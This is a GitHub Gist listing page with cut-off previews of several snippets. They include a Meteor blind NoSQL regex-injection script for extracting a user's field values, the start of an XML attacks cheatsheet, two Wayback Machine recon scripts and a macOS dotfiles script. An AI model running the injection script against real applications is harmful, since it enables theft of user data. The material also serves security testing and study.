Skip to content

Instantly share code, notes, and snippets.

@ojasookert
ojasookert / meteor-regex-blind-nosql.js
Created August 2, 2019 14:14
Exfiltrate data via vulnerable Meteor method
(function exploit(user, field, alphabet, data = '', index = 0) {
Meteor.call('users.count', {username: user, [field] : {$regex: '^' + data + alphabet[index] + '.*'}}, (err, res) => {
console.log('^' + data + alphabet[index] + '.*', res);
if (res == 0) {
index++;
} else {
data += alphabet[index];
index = 0;
}
if (index >= alphabet.length) {
@mgeeky
mgeeky / xml-attacks.md
Last active April 13, 2024 15:52
XML Vulnerabilities and Attacks cheatsheet

XML Vulnerabilities

XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.

The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.


import requests
import sys
import json
def waybackurls(host, with_subs):
if with_subs:
url = 'http://web.archive.org/cdx/search/cdx?url=*.%s/*&output=json&fl=original&collapse=urlkey' % host
else:
url = 'http://web.archive.org/cdx/search/cdx?url=%s/*&output=json&fl=original&collapse=urlkey' % host
import requests
import re
import sys
from multiprocessing.dummy import Pool
def robots(host):
r = requests.get(
'https://web.archive.org/cdx/search/cdx\
?url=%s/robots.txt&output=json&fl=timestamp,original&filter=statuscode:200&collapse=digest' % host)
#!/bin/sh
# Some things taken from here
# https://github.com/mathiasbynens/dotfiles/blob/master/.osx
# Set the colours you can use
black='\033[0;30m'
white='\033[0;37m'
red='\033[0;31m'
green='\033[0;32m'